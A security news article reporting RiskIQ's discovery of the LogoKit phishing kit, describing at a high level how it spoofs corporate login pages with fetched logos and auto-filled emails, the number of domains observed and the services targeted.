Researchers from RiskIQ discovered a new phishing kit that outstands for its ability to dynamically create phishing messages to target specific users.
LogoKit has a modular structure that makes it easy to implement a phishing-as-as-Service model.
Upon navigating the URL, the LogoKit kit fetches the company logo from a third-party service (i.e. Clearbit or Google’s favicon database) and auto-fills the landing page with the victim’s username or email address in order to trick victims into feeling like they have previously logged into the site. Once the victim entered its password, LogoKit performs an AJAX request, sending the recipient’s credentials to an external source, and, finally, redirecting it to their corporate web site.
“RiskIQ has tracked LogoKit being used in simple login forms to trick users and embedded into more complex HTML documents pretending to be other services. Due to the simplicity of LogoKit, attackers can easily compromise sites and embed their script or host their own infrastructure.” reads the report published by the experts. “In some cases, attackers have been observed using legitimate object storage buckets, allowing them to appear less malicious by having users navigate to a known domain name, i.e., Google Firebase.”
RiskIQ spotted more than seven hundred unique domains running with LogoKit in the last thirty days. Threat actors targeted multiple services including MS SharePoint, Adobe Document Cloud, OneDrive, Office 365, and Cryptocurrency exchanges.
In some instances, RiskIQ experts noticed LogoKit kits that were preventing victims from using keyboard shortcuts in order to view/inspect webpage content.
“The LogoKit presents a unique opportunity for attackers, allowing for easy integration into either existing HTML pretext templates or building simple login forms to mimic corporate login portals. Also, with the flexibility of either leveraging compromised infrastructure, attacker-hosted infrastructure, or object storage, attackers can quickly change their delivery source.” concludes the report. “With LogoKit’s intended functionality to be centered around singular emails per URL and extracting company logos, this dramatically improves ease of carrying out targeted attacks against organizations; and reusing pretexts without changing templates.”
If you want to receive the weekly Security Affairs Newsletter for free subscribe here.
(SecurityAffairs – hacking, Phishing)